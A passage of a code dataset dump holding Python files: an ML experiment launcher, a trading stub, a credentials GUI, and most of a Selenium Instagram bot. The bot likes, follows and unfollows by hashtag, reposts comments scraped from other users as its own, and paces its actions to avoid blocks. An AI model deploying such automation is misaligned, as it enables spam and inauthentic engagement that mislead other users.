lambda val: val.isnumeric() and int(val) > 0\n },\n {\n 'type': 'input',\n 'name': 'batch_size',\n 'message': 'Batch Size: ',\n 'default': '160',\n 'validate': lambda val: val.isnumeric() and int(val) > 0\n },\n {\n 'type': 'input',\n 'name': 'repeats',\n 'message': 'How many time should the experiment be repeated?',\n 'default': '5',\n 'validate': lambda val: val.isnumeric() and int(val) > 0\n }\n]\n\nquestions_figure_1 = [\n {\n 'type': 'input',\n 'name': 'config_path',\n 'message': 'Path to the experiment config:',\n 'default': os.path.join(os.path.dirname(os.path.realpath(__file__)),\n 'src/scripts/figure_1/config_clothing.json'),\n 'validate': lambda val: os.path.isfile(val)\n },\n {\n 'type': 'input',\n 'name': 'gpu',\n 'message': 'Index of GPU:',\n 'default': '0',\n 'validate': lambda val: val.isnumeric() and int(val) >= 0\n },\n {\n 'type': 'list',\n 'name': 'model',\n 'message': 'Which model should be trained: ',\n 'choices': ['ResNet18', 'ResNet50', 'densenet121', 'mobilenet_v2', 'inception_v3', 'googlenet']\n },\n {\n 'type': 'list',\n 'name': 'train_type',\n 'message': 'Type of training:',\n 'choices': [\"IRR\", \"Baseline\", \"Target\"]\n }\n]\nquestions_figure_1_if_target = [\n {\n 'type': 'input',\n 'name': 'irr_path',\n 'message': 'Path to IRR model:',\n 'validate': lambda val: os.path.isfile(val)\n }\n]\n\nquestions_figure_2_train_type = [\n {\n 'type': 'list',\n 'name': 'train_type',\n 'message': 'Type of training:',\n 'choices': [\"IRR\", \"Baseline\", \"Target\"]\n }\n]\n\nquestions_figure_2_baseline = [\n {\n 'type': 'input',\n 'name': 'config_path',\n 'message': 'Path to the experiment config:',\n 'default': os.path.join(os.path.dirname(os.path.realpath(__file__)),\n 'src/scripts/figure_2/0_baseline/config.json'),\n 'validate': lambda val: os.path.isfile(val)\n },\n {\n 'type': 'list',\n 'name': 'dataset',\n 'message': 'Type of training:',\n 'choices': [\"CIFAR10\", \"CIFAR100\", \"CINIC10\"]\n },\n {\n 'type': 'input',\n 'name': 'gpu',\n 'message': 'Index of GPU:',\n 'default': '0',\n 'validate': lambda val: val.isnumeric() and int(val) >= 0\n },\n {\n 'type': 'list',\n 'name': 'model',\n 'message': 'Model to be trained:',\n 'choices': ['ResNet18', 'ResNet34', 'ResNet50', 'densenet121',\n 'googlenet', 'inception_v3', 'mobilenet_v2', 'vgg11']\n },\n]\n\nquestions_figure_2_irr = [\n {\n 'type': 'input',\n 'name': 'config_path',\n 'message': 'Path to the experiment config:',\n 'default': os.path.join(os.path.dirname(os.path.realpath(__file__)),\n 'src/scripts/figure_2/1_big_model/config.json'),\n 'validate': lambda val: os.path.isfile(val)\n },\n {\n 'type': 'input',\n 'name': 'gpu',\n 'message': 'Index of GPU:',\n 'default': '0',\n 'validate': lambda val: val.isnumeric() and int(val) >= 0\n }\n]\n\nquestions_figure_2_target = [\n {\n 'type': 'list',\n 'name': 'mode',\n 'message': 'Mode:',\n 'choices': ['Normal', 'No Holdout', 'Archtecture Transfer', 'Hyperparameter Transfer']\n },\n {\n 'type': 'input',\n 'name': 'config_path',\n 'message': 'Path to the experiment config:',\n 'default': os.path.join(os.path.dirname(os.path.realpath(__file__)),\n 'src/scripts/figure_2/1_big_model/config_target_local.json'),\n 'validate': lambda val: os.path.isfile(val)\n },\n {\n 'type': 'input',\n 'name': 'gpu',\n 'message': 'Index of GPU:',\n 'default': '0',\n 'validate': lambda val: val.isnumeric() and int(val) >= 0\n }\n]\n\nquestions_figure_2_target_architecture = [\n {\n 'type': 'list',\n 'name': 'model',\n 'message': 'Model:',\n 'choices': ['ResNet18', 'ResNet34', 'ResNet50', 'densenet121',\n 'googlenet', 'inception_v3', 'mobilenet_v2', 'vgg11']\n }\n]\n\n\ndef main():\n answers = prompt(questions, style=custom_style_2)\n selected_option = answers.get('user_option')\n\n arguments = []\n if selected_option == 'Figure 1':\n answers = prompt(questions_figure_1, style=custom_style_2)\n arguments = [sys.executable or 'python', 'src/scripts/figure_1/generate_data.py',\n '-p', answers['config_path'],\n '-g', answers['gpu'],\n '-m', answers['model'],\n '-t', str(answers['train_type'] == 'IRR')]\n\n if answers['train_type'] == 'Target':\n irr_model = prompt(questions_figure_1_if_target, style=custom_style_2)['irr_path']\n arguments.append('-i')\n arguments.append(irr_model)\n print('Starting experiment for Figure 1!')\n elif selected_option == 'Figure 2':\n print('Starting experiment for Figure 2!')\n train_type = prompt(questions_figure_2_train_type, style=custom_style_2)['train_type']\n if train_type == 'Baseline':\n answers = prompt(questions_figure_2_baseline, style=custom_style_2)\n if answers['model'] == 'ResNet18':\n file = f'src/scripts/figure_2/0_baseline/generate_baseline_{answers[\"dataset\"].lower()}.py'\n arguments = [sys.executable or 'python', file, answers['config_path'], answers['gpu']]\n else:\n file = 'src/scripts/figure_2/5_architecture/train_base.py'\n arguments = [sys.executable or 'python', file,\n '-p', answers['config_path'],\n '-m', answers['model'],\n '-g', answers['gpu']]\n elif train_type == 'IRR':\n answers = prompt(questions_figure_2_irr, style=custom_style_2)\n arguments = [sys.executable or 'python', 'src/scripts/figure_2/train_irr.py',\n '-p', answers['config_path'],\n '-g', answers['gpu']]\n elif train_type == 'Target':\n answers = prompt(questions_figure_2_target, style=custom_style_2)\n mode = answers['mode']\n if mode == 'Normal':\n arguments = [sys.executable or 'python', 'src/scripts/figure_2/train_target.py',\n '-p', answers['config_path'],\n '-g', answers['gpu']]\n if mode == 'No Holdout':\n arguments = [sys.executable or 'python', 'src/scripts/figure_2/3_no_holdout/train_target_no_holdout.py',\n '-p', answers['config_path'],\n '-g', answers['gpu']]\n if mode == 'Archtecture Transfer':\n model = prompt(questions_figure_2_target_architecture, style=custom_style_2)['model']\n arguments = [sys.executable or 'python', 'src/scripts/figure_2/5_architecture/train_target.py',\n '-p', answers['config_path'],\n '-g', answers['gpu'],\n '-m', model]\n if mode == 'Hyperparameter Transfer':\n arguments = [sys.executable or 'python', 'src/scripts/figure_2/5_hyperparameter'\n '/train_target_gridsearch.py',\n '-p', answers['config_path'],\n '-g', answers['gpu']]\n\n elif selected_option == 'Figure 6':\n answers = prompt(questions_figure_6, style=custom_style_2)\n arguments = [sys.executable or 'python', 'src/scripts/figure_6/generate_figure_6_data.py',\n answers['batch_size'], answers['repeats'], answers['data_path'], answers['epochs']]\n print('Starting experiment for Figure 6!')\n\n try:\n p = Popen(arguments)\n except KeyboardInterrupt:\n p.send_signal(signal.SIGINT)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"TNJKvm/stood-over-june","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":8896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16360796477","text":"import alpaca_trade_api as tradeapi\nimport time\n\n\ndef get_current_positions():\n api = tradeapi.REST() # insert credentials\n current_portfolio = api.list_positions()\n\n # Print the quantity of shares for each position.\n for position in current_portfolio:\n print(\"{} shares of {}\".format(position.qty, position.symbol))\n\n\ndef supervise_bought_stocks():\n while True:\n # open_positions = get_current_positions()\n time.sleep(100)\n","repo_name":"rbroesamle/ai-stock-trader","sub_path":"supervisor.py","file_name":"supervisor.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21782311292","text":"from tkinter import *\n\nfrom os.path import expanduser\nimport os\nfrom utils.handle_credentials import Window_save_credentials, read_credentials\nfrom utils.handle_download import start_download\n\nlogo_path = os.path.join(os.path.dirname(__file__) + \"\\\\img\\\\logo_open_mastr.ico\")\n\nwindow_title = \"open-MaStR Desktop\"\ncredentials_file_path = os.path.join(\n expanduser(\"~\"), \".open-MaStR\", \"config\", \"credentials2.cfg\"\n)\n\nroot = Tk()\nroot.title(window_title)\nroot.iconbitmap(logo_path)\nroot.geometry(\"400x400\")\n\n\n\"\"\"Frame Credentials\"\"\"\nframe_credentials = Frame(root, padx=10, pady=10)\nframe_credentials.pack(padx=5, pady=5)\n\nmastr_nr, mastr_token = read_credentials(credentials_file_path)\nlabel_mastr_nr = Label(frame_credentials, text=f\"MaStR-Nr.: {mastr_nr}\")\nlabel_mastr_token = Label(frame_credentials, text=f\"Token: {mastr_token}\")\n\nlabel_mastr_nr.grid(row=0, column=0)\nlabel_mastr_token.grid(row=1, column=0)\n\nsave_credentials_button = Button(\n frame_credentials,\n text=\"Edit MaStR Credentials\",\n command=lambda: Window_save_credentials(\n window_title=window_title,\n logo_path=logo_path,\n credentials_file_path=credentials_file_path,\n label_mastr_nr=label_mastr_nr,\n label_mastr_token=label_mastr_token,\n ),\n)\nsave_credentials_button.grid(row=2, column=0)\n\n\n\"\"\"Frame Download\"\"\"\nframe_download = Frame(root, padx=10, pady=10)\nframe_download.pack(padx=5, pady=5)\n\ndownload_button = Button(\n frame_download,\n text=\"Download MaStR\",\n command=lambda: start_download(),\n)\ndownload_button.grid(row=2, column=0)\n\n\n# Create event loop\nroot.mainloop()\n","repo_name":"FlorianK13/open-mastr-GUI","sub_path":"src/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17997462420","text":"#-*- coding: utf-8 -*-\n\nimport re\nimport log\nimport random\nimport telegrambot\nimport filewriter\nfrom time import sleep\nfrom crawler2 import Crawler\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\n\nclass Instagram (Crawler):\n\n LOGIN_URL = 'https://www.instagram.com/accounts/login/?source=auth_switcher'\n TAG_URL = 'https://www.instagram.com/explore/tags/'\n UNFOLLOW_URL = 'https://www.instagram.com/kuhitlove/'\n FOLLOW_PER_LIKE = 3;\n FOLLOW_CNT = 0;\n FOLLOW_ACCEPT_CNT = 0;\n FOLLOWING_CANCEL_CNT = 0;\n LIKE_CNT = 0;\n REPLY_CNT = 0;\n FAIL_CNT = 0;\n CRITICAL_CNT = 0;\n FOLLOWER_CNT = 0;\n FOLLOWING_CNT = 0;\n REPLY = [];\n FOLLOWERS = [];\n FOLLOWINGS = [];\n TARGET_NAME = ''\n\n starttime = datetime.now()\n\n def start(self):\n try:\n # if self.connect(site_url=self.UNFOLLOW_URL, is_proxy=False, default_driver='selenium', is_chrome=True) is False:\n # raise Exception('site connect fail')\n #\n # self.following()\n # exit()\n\n # 보안 블럭 관련 데이터 가져오기\n self.security_code = filewriter.get_log_file('instagram_security_code')\n\n # 블럭 상태라면 security_code가 입력될 때 까지는 종료\n if self.security_code[0] == 'blocked':\n log.logger.info('Instagram is blocked.')\n self.destroy()\n exit()\n\n # 복사된 태그 가져오기\n self.tag = filewriter.get_log_file('instagramcollecttag_copied')\n\n # 파일이 없다면 태그파일 복사본을 생성\n if self.tag is None or len(self.tag) == 0:\n self.tag = filewriter.get_log_file('instagramcollecttag')\n filewriter.save_log_file('instagramcollecttag_copied', self.tag)\n\n # 태그를 생성할 수 없다면 종료\n if self.tag is None:\n self.destroy()\n exit()\n\n # 태그 랜덤으로 섞기\n random.shuffle(self.tag)\n\n self.login()\n\n # self.driver.save_screenshot('instagram_screenshot.png')\n # self.destroy()\n # exit()\n\n # 작업 시작\n\n # 팔로워 정리\n if self.follower() is True:\n # 팔로윙 정리\n self.following()\n\n # 작업 시작\n self.scan_page()\n\n self.end_report()\n\n except Exception as e:\n log.logger.error(e, exc_info=True)\n self.end_report()\n\n def end_report(self):\n duration = int((datetime.now() - self.starttime).total_seconds() / 60)\n log.logger.info('[durations %d min] Instagram process has completed. FOLLOWER_CNT (%d),FOLLOWING_CNT (%d),FOLLOW_CNT (%d), LIKE_CNT (%d), REPLY_CNT (%d), FOLLOW_ACCEPT_CNT (%d), FOLLOWING_CANCEL_CNT (%d), FAIL_CNT (%d)' % (duration, self.FOLLOWER_CNT, self.FOLLOWING_CNT, self.FOLLOW_CNT, self.LIKE_CNT, self.REPLY_CNT, self.FOLLOW_ACCEPT_CNT, self.FOLLOWING_CANCEL_CNT, self.FAIL_CNT))\n\n # 당분간 텔레그램으로 결과알림을 받자\n telegrambot.send_message('[durations %d min] Instagram process has completed. FOLLOWER_CNT (%d),FOLLOWING_CNT (%d),FOLLOW_CNT (%d), LIKE_CNT (%d), REPLY_CNT (%d), FOLLOW_ACCEPT_CNT (%d), FOLLOWING_CANCEL_CNT (%d), FAIL_CNT (%d)' % (duration, self.FOLLOWER_CNT, self.FOLLOWING_CNT, self.FOLLOW_CNT, self.LIKE_CNT, self.REPLY_CNT, self.FOLLOW_ACCEPT_CNT, self.FOLLOWING_CANCEL_CNT, self.FAIL_CNT), 'instagram')\n\n self.FOLLOW_CNT = 0\n self.LIKE_CNT = 0\n self.REPLY_CNT = 0\n self.FAIL_CNT = 0\n self.REPLY = []\n\n self.destroy()\n exit()\n\n # log.logger.info('Waiting browser rebooting.... (2 min)')\n #\n # # 2분 대기\n # sleep(60 * 2)\n #\n # # 오류가 반복되면 텔레그램 메세지 보내고 종료\n # if self.CRITICAL_CNT > 2:\n # telegrambot.send_message('Instagram bot has just stopoed!!!!', 'instagram')\n # exit();\n #\n # self.start()\n\n def login(self):\n try:\n # 로그인 여부 체크\n if self.connect(site_url=self.UNFOLLOW_URL, is_proxy=False, default_driver='selenium', is_chrome=True) is False:\n raise Exception('site connect fail')\n\n self.get_cookie()\n\n if self.connect(site_url=self.UNFOLLOW_URL, is_proxy=False, default_driver='selenium',\n is_chrome=True) is False:\n raise Exception('site connect fail')\n\n try:\n if self.selenium_exist_by_xpath(xpath='//*[@id=\"react-root\"]/section/nav/div[2]/div/div/div[3]/div/span/a[1]/button') is False:\n log.logger.info('Already loggined.')\n return True\n except:\n pass\n\n # 로그인 되어있지 않다면 로그인 페이지로 이동\n if self.connect(site_url=self.LOGIN_URL, is_proxy=False, default_driver='selenium', is_chrome=True) is False:\n raise Exception('site connect fail')\n\n # 계정정보 가져오기\n account_data = filewriter.get_log_file(self.name + '_account')\n\n if account_data:\n if self.selenium_extract_by_xpath(tag={'tag': 'input', 'attr': 'name', 'name': 'username'}) is False:\n raise Exception('selenium_extract_by_xpath fail.')\n\n # 아이디 입력\n if self.selenium_input_text_by_xpath(text=account_data[0], tag={'tag': 'input', 'attr': 'name', 'name': 'username'}) is False:\n raise Exception('selenium_input_text_by_xpath fail. username')\n\n # 비번 입력\n if self.selenium_input_text_by_xpath(text=account_data[1], tag={'tag': 'input', 'attr': 'name', 'name': 'password'}) is False:\n raise Exception('selenium_input_text_by_xpath fail. password')\n\n # 아이디 입력\n if self.selenium_input_text_by_xpath(text=account_data[0], tag={'tag': 'input', 'attr': 'name', 'name': 'username'}) is False:\n raise Exception('selenium_input_text_by_xpath fail. username')\n\n # 비번 입력\n if self.selenium_input_text_by_xpath(text=account_data[1], tag={'tag': 'input', 'attr': 'name', 'name': 'password'}) is False:\n raise Exception('selenium_input_text_by_xpath fail. password')\n\n # 로그인하기 선택\n if self.selenium_click_by_xpath(tag={'tag': 'button', 'attr': 'type', 'name': 'submit'}) is False:\n raise Exception('selenium_click_by_xpath fail. submit')\n\n sleep(3)\n\n # 비정상적인 로그인 시도 처리 (내가 맞습니다)\n try:\n if self.selenium_exist_by_xpath(xpath='//*[@id=\"react-root\"]/section/div/div/div[3]/form/div[2]/span/button') is True:\n self.selenium_click_by_xpath(xpath='//*[@id=\"react-root\"]/section/div/div/div[3]/form/div[2]/span/button')\n except:\n pass\n\n # 보안코드\n try:\n if self.selenium_exist_by_xpath(xpath='//*[@id=\"react-root\"]/section/div/div/div[1]/div/p') is True:\n if self.selenium_exist_by_xpath(xpath='//*[@id=\"react-root\"]/section/div/div/div[3]/form/span/button') is True:\n\n # 보안코드가 없다면 block 처리해서 인스타그램 프로세스를 중지\n if self.security_code[0] == '':\n self.security_code[0] = 'blocked'\n filewriter.save_log_file('instagram_security_code', self.security_code)\n log.logger.info('Instagram has just blocked.')\n telegrambot.send_message('Instagram has just blocked.', 'instagram')\n self.destroy()\n exit()\n\n # 발송하기\n self.selenium_click_by_xpath(xpath='//*[@id=\"react-root\"]/section/div/div/div[3]/form/span/button')\n\n # 텔레그램 알림\n telegrambot.send_message('Please check instagram security code from your email in 1 minutes.', 'instagram')\n log.logger.info('Please check instagram security code from your email in 1 minutes.')\n\n # 수정될 때 까지 50초 대기\n sleep(50)\n\n # 새롭게 입력된 데이터를 가져옵니다.\n self.security_code = filewriter.get_log_file('instagram_security_code')\n\n # 보안코드 입력\n if self.selenium_input_text_by_xpath(text=self.security_code[0], xpath='//*[@id=\"security_code\"]') is False:\n raise Exception('selenium_input_text_by_xpath fail. security_code')\n\n # 제출\n self.selenium_click_by_xpath(xpath='//*[@id=\"react-root\"]/section/div/div/div[2]/form/span/button')\n\n log.logger.info('security_code. (%s)' % (self.security_code[0]))\n\n # 사용한 코드는 제거\n self.security_code[0] = ''\n filewriter.save_log_file('instagram_security_code', self.security_code)\n\n sleep(5)\n\n except Exception as e:\n log.logger.error(e, exc_info=True)\n pass\n\n try:\n if self.selenium_exist_by_xpath(xpath='//*[@id=\"react-root\"]/section/nav/div[2]/div/div/div[3]/div/div/div/div/div[3]/div[1]/a') is True:\n log.logger.info('login fail.')\n raise Exception('login fail error')\n except:\n pass\n\n log.logger.info('login success!')\n\n self.set_cookie()\n\n sleep(2)\n\n return True\n except Exception as e:\n log.logger.error(e, exc_info=True)\n self.end_report()\n\n return False\n\n def scan_page(self):\n try:\n if self.FAIL_CNT > 3:\n raise Exception('Block error')\n\n if self.connect(site_url=self.TAG_URL + self.tag[0] + '/', is_proxy=False, default_driver='selenium', is_chrome=True) is False:\n raise Exception('site connect fail')\n\n if self.selenium_extract_by_xpath(tag={'tag': 'div', 'attr': 'class', 'name': 'EZdmt'}) is False:\n raise Exception('selenium_extract_by_xpath fail.')\n\n # 상단의 인기게시글 (최대 9개)\n list = self.driver.find_element_by_xpath(\"//div[@class='EZdmt']\").find_elements_by_xpath('.//div[contains(@class,\"v1Nh3\")]/a')\n\n for li in list:\n try:\n self.is_need_sleep = False\n\n # 레이어 열기\n li.click()\n\n # 레이어 기다림\n if self.selenium_extract_by_xpath(xpath='//article[contains(@class,\"M9sTE\")]') is False:\n raise Exception('selenium_extract_by_xpath fail.')\n\n # 채널명\n target_name = self.driver.find_element_by_xpath('//article[contains(@class,\"M9sTE\")]/header/div[2]/div[1]/div[1]/h2/a')\n if target_name:\n self.TARGET_NAME = target_name.text\n\n # 사용할 댓글이 없다면 수집만 먼저\n if len(self.REPLY) == 0:\n self.reply_collect()\n self.selenium_click_by_xpath(xpath='//button[contains(@class,\"ckWGn\")]')\n continue\n\n if self.like() is True:\n self.follow()\n self.reply_collect()\n self.reply_send()\n\n # 작업이 있었다면 block을 피하기 위해 sleep\n if self.is_need_sleep is True:\n #sleep_second = random.randint(180, 200)\n sleep_second = random.randint(50, 60)\n #log.logger.info('sleeping.. %d' % (sleep_second))\n sleep(sleep_second)\n self.is_need_sleep = True\n\n # 레이어 닫기\n self.selenium_click_by_xpath(xpath='//button[contains(@class,\"ckWGn\")]')\n\n except Exception as e:\n log.logger.error(e, exc_info=True)\n self.FAIL_CNT = self.FAIL_CNT + 1\n\n break\n\n self.tag.pop(0)\n filewriter.save_log_file('instagramcollecttag_copied', self.tag)\n\n self.CRITICAL_CNT = 0\n\n # 팔로우 100개 마다 브라우저 리셋\n duration = int((datetime.now() - self.starttime).total_seconds() / 60)\n # print(duration)\n # 10분 동안 작업 했다면 종료\n if duration > 10:\n # if (self.FOLLOW_CNT > 5):\n return True\n\n if len(self.tag) > 0:\n self.scan_page()\n\n except Exception as e:\n self.CRITICAL_CNT = self.CRITICAL_CNT + 1\n log.logger.error(e, exc_info=True)\n\n # 태그 삭제\n tag_copy = filewriter.get_log_file('instagramcollecttag_copied')\n if tag_copy:\n tag_copy.remove(self.tag[0])\n filewriter.save_log_file('instagramcollecttag_copied', tag_copy)\n\n tag = filewriter.get_log_file('instagramcollecttag')\n if tag:\n tag.remove(self.tag[0])\n filewriter.save_log_file('instagramcollecttag', tag)\n\n self.end_report()\n\n # 팔로우\n def follow(self):\n try:\n # follow는 like n회당 1회씩\n if self.LIKE_CNT % self.FOLLOW_PER_LIKE != 0:\n return True\n\n btn_follow = self.driver.find_element_by_xpath('//article[contains(@class,\"M9sTE\")]/header/div[2]/div[1]/div[2]/button')\n\n if btn_follow:\n if '팔로우' in btn_follow.text or 'Follow' == btn_follow.text:\n # 팔로우 버튼 클릭\n self.selenium_click_by_xpath(xpath='//article[contains(@class,\"M9sTE\")]/header/div[2]/div[1]/div[2]/button')\n self.FOLLOW_CNT = self.FOLLOW_CNT + 1\n self.is_need_sleep = True\n\n if self.TARGET_NAME:\n log.logger.info('follow. (%s)' % (self.TARGET_NAME))\n\n # # 사진분석\n # try:\n # reply_prev = ''\n #\n # photo_analytics = self.driver.find_element_by_xpath('//article[contains(@class,\"M9sTE\")]/div[1]/div/div/div[1]').find_element_by_xpath('.//img')\n #\n # if photo_analytics:\n # photo_analytics_text = photo_analytics.get_attribute(\"alt\")\n # if photo_analytics_text:\n # if any(word in photo_analytics_text for word in ['selfie']):\n # reply_prev = '외모가 미쳤다!! '\n # elif any(word in photo_analytics_text for word in ['1 person']):\n # reply_prev = '멋짐이 폭팔 '\n # elif any(word in photo_analytics_text for word in ['food']):\n # reply_prev = '아 배고파......ㅜ '\n # elif any(word in photo_analytics_text for word in ['nature']):\n # reply_prev = '사진 퀄리티 대박........ '\n # elif any(word in photo_analytics_text for word in ['dog']):\n # reply_prev = '멍멍이 귀욤귀욤~ '\n #\n # print(photo_analytics_text)\n # except Exception as e:\n # log.logger.error(e, exc_info=True)\n #\n #\n\n return True\n\n except Exception as e:\n log.logger.error(e, exc_info=True)\n\n return False\n\n # 댓글 달기\n def reply_send(self):\n try:\n # 댓글은 like n회당 1회씩\n if self.LIKE_CNT % self.FOLLOW_PER_LIKE != 0:\n return True\n\n # 댓글 달기\n self.selenium_click_by_xpath(xpath='//article[contains(@class,\"M9sTE\")]/div[2]/section[1]/span[2]/button')\n\n # chrome에서 허용하는 댓글이 아니라면 제거하면서 탐색\n while (True):\n try:\n # 댓글이 없다면 종료\n if len(self.REPLY) == 0:\n break\n\n # 댓글 입력\n if self.selenium_input_text_by_xpath(text=self.REPLY[0], xpath='//article[contains(@class,\"M9sTE\")]/div[2]/section[3]/div/form/textarea') is True:\n # 엔터\n self.selenium_enterkey_by_xpath(xpath='//article[contains(@class,\"M9sTE\")]/div[2]/section[3]/div/form/textarea')\n log.logger.info('%s' % (self.REPLY[0]))\n # log.logger.info(self.REPLY)\n self.REPLY_CNT = self.REPLY_CNT + 1\n self.REPLY.pop(0)\n break\n\n self.REPLY.pop(0)\n except Exception:\n continue\n\n return True\n\n except Exception as e:\n log.logger.error(e, exc_info=True)\n # return False\n\n return False\n\n # 좋아요\n def like(self):\n try:\n # 좋아요\n btn_like = self.driver.find_element_by_xpath('//article[contains(@class,\"M9sTE\")]/div[2]/section[1]/span[1]/button/span')\n\n if btn_like:\n if 'grey' in btn_like.get_attribute(\"class\"):\n # 좋아요 버튼 클릭\n self.selenium_click_by_xpath(xpath='//article[contains(@class,\"M9sTE\")]/div[2]/section[1]/span[1]/button')\n self.LIKE_CNT = self.LIKE_CNT + 1\n self.is_need_sleep = True\n log.logger.info('Liked.')\n\n return True\n\n except Exception as e:\n log.logger.error(e, exc_info=True)\n\n return False\n\n # 댓글 수집\n def reply_collect(self):\n try:\n group_reply = self.driver.find_element_by_xpath('//article[contains(@class,\"M9sTE\")]/div[2]/div[1]/ul')\n if group_reply:\n soup_list_reply = BeautifulSoup(group_reply.get_attribute('innerHTML'), 'html.parser')\n for reply in soup_list_reply.find_all('li'):\n try:\n if reply:\n soup_reply = reply.find('div', class_='C4VMK').find('span')\n if soup_reply:\n if soup_reply.a:\n soup_reply.a.clear()\n reply_text = soup_reply.getText().strip()\n # print('%s (%d)' % (reply_text, len(reply_text)))\n # 허용 문구\n if any(word in reply_text for word in ['선팔', '맞팔', '소통해', '소통하', '잘보고', '잘보구', '구경']):\n # 길이 제한\n if len(reply_text) > 30:\n continue\n # 금지 문구\n if any(word in reply_text for word in ['넹','필라','요가','군요','귀','입니다','염','덕','레슨','맘', '육아', '#', '무료', '신발', '그램', '진행', '세', '셔', '운동', '이쁘', '이뻐', '예', '쁜', '님', '가세요', '?', '부탁', '방문', '옷', '몸','누나','옆구리','있는','다시','팀장','사업']):\n continue\n\n # 공백 제거\n reply_text = re.sub(' +', ' ', reply_text)\n log.logger.info('%s' % (reply_text))\n\n # 댓글 목록에 추가\n if reply_text not in self.REPLY:\n self.REPLY.append(reply_text)\n except Exception:\n continue\n\n return True\n\n except Exception as e:\n log.logger.error(e, exc_info=True)\n # return False\n\n return False\n\n # 팔로워 정리\n def follower(self):\n try:\n if self.connect(site_url=self.UNFOLLOW_URL, is_proxy=False, default_driver='selenium', is_chrome=True) is False:\n raise Exception('site connect fail')\n\n if self.selenium_click_by_xpath(xpath='//*[@id=\"react-root\"]/section/main/div/header/section/ul/li[2]/a') is False:\n raise Exception('selenium_extract_by_xpath fail.')\n\n if self.selenium_extract_by_xpath(xpath='/html/body/div[3]/div/div[2]/ul/div/li[1]') is False:\n raise Exception('selenium_extract_by_xpath fail.')\n\n # 스크롤 내려서 모두 불러오기\n if self.scroll_bottom(selectorParent='document.getElementsByClassName(\"isgrP\")[0]', selectorDom='document.getElementsByClassName(\"_6xe7A\")[0]', limit_page=40) is False:\n raise Exception('scroll bottom fail.')\n\n # 맞팔이 아닌 경우 팔로우 클릭\n list = self.driver.find_elements_by_xpath('/html/body/div[3]/div/div[2]/ul/div/li')\n\n for li in list:\n try:\n accept_follow = li.find_element_by_xpath('.//button[text() = \"Follow\"]')\n if accept_follow:\n accept_follow.click()\n\n channel_follow = li.find_element_by_xpath('.//a[contains(@class,\"FPmhX\")]')\n if channel_follow:\n id_following_accepted = channel_follow.text\n log.logger.info('following accepted. (%s)' % (id_following_accepted))\n\n self.FOLLOW_ACCEPT_CNT = self.FOLLOW_ACCEPT_CNT + 1\n sleep(2)\n except Exception as e:\n continue\n\n followers = self.driver.find_element_by_xpath('/html/body/div[3]/div/div[2]/ul')\n if followers:\n soup_list_follewers = BeautifulSoup(followers.get_attribute('innerHTML'), 'html.parser')\n for follower in soup_list_follewers.find_all('li'):\n try:\n if follower:\n soup_follower_link = follower.find('a', class_='FPmhX')\n if soup_follower_link:\n follower_id = soup_follower_link.getText().strip()\n # print('%s' % (follower_id))\n\n # 팔로워 목록에 추가\n if follower_id not in self.FOLLOWERS:\n self.FOLLOWERS.append(follower_id)\n except Exception:\n continue\n\n # print(self.FOLLOWERS)\n log.logger.info('followers list. (%s)' % (','.join(self.FOLLOWERS)))\n\n self.selenium_click_by_xpath(xpath='/html/body/div[3]/div/div[1]/div/div[2]/button')\n\n return True\n\n except Exception as e:\n log.logger.error(e, exc_info=True)\n\n return False\n\n # 팔로윙 정리\n def following(self):\n try:\n # 현재 팔로워, 팔로윙 숫자\n follower = self.driver.find_element_by_xpath('//*[@id=\"react-root\"]/section/main/div/header/section/ul/li[2]/a/span')\n if follower:\n soup_follewer = BeautifulSoup(follower.get_attribute('innerHTML'), 'html.parser')\n self.FOLLOWER_CNT = soup_follewer.getText().strip()\n self.FOLLOWER_CNT = int(self.FOLLOWER_CNT.replace(',', ''))\n\n following = self.driver.find_element_by_xpath('//*[@id=\"react-root\"]/section/main/div/header/section/ul/li[3]/a/span')\n if following:\n soup_following = BeautifulSoup(following.get_attribute('innerHTML'), 'html.parser')\n self.FOLLOWING_CNT = soup_following.getText().strip()\n self.FOLLOWING_CNT = int(self.FOLLOWING_CNT.replace(',', ''))\n\n gap_follow = self.FOLLOWING_CNT - self.FOLLOWER_CNT - 150;\n\n log.logger.info('FOLLOWER_CNT (%d)' % (self.FOLLOWER_CNT))\n log.logger.info('FOLLOWING_CNT (%d)' % (self.FOLLOWING_CNT))\n log.logger.info('gap_follow (%d)' % (gap_follow))\n\n if gap_follow < 0:\n return True\n\n if self.selenium_click_by_xpath(\n xpath='//*[@id=\"react-root\"]/section/main/div/header/section/ul/li[3]/a') is False:\n raise Exception('selenium_extract_by_xpath fail.')\n\n if self.selenium_extract_by_xpath(xpath='/html/body/div[3]/div/div[2]/ul/div/li[1]') is False:\n raise Exception('selenium_extract_by_xpath fail.')\n\n # 스크롤 내려서 모두 불러오기\n if self.scroll_bottom(selectorParent='document.getElementsByClassName(\"isgrP\")[0]', selectorDom='document.getElementsByClassName(\"_6xe7A\")[0]', limit_page=20) is False:\n raise Exception('scroll bottom fail.')\n\n # 아래부터 팔로우 취소\n list = self.driver.find_elements_by_xpath('/html/body/div[3]/div/div[2]/ul/div/li')\n\n for li in reversed(list):\n try:\n # 15분동안 30회 취소 후 종료\n # if self.FOLLOWING_CANCEL_CNT >= self.FOLLOW_CNT + 1:\n # if self.FOLLOWING_CANCEL_CNT >= self.FOLLOW_CNT + self.FOLLOW_ACCEPT_CNT:\n if gap_follow < 0:\n break\n\n elem_following = li.find_element_by_xpath('.//a[contains(@class,\"FPmhX\")]')\n if elem_following:\n id_following = elem_following.text\n if id_following not in self.FOLLOWERS:\n cancel_following = li.find_element_by_xpath('.//button[contains(@class,\"_8A5w5\")]')\n if cancel_following:\n cancel_following.click()\n self.selenium_click_by_xpath(xpath='/html/body/div[4]/div/div/div[3]/button[1]')\n self.FOLLOWING_CANCEL_CNT = self.FOLLOWING_CANCEL_CNT + 1\n log.logger.info('following canceled. (%s)' % (id_following))\n gap_follow = gap_follow - 1\n sleep(25)\n except Exception as e:\n log.logger.error(e, exc_info=True)\n gap_follow = gap_follow - 1\n continue\n\n return True\n\n except Exception as e:\n log.logger.error(e, exc_info=True)\n\n return False\n\n # 스크롤 가장 아래로\n def 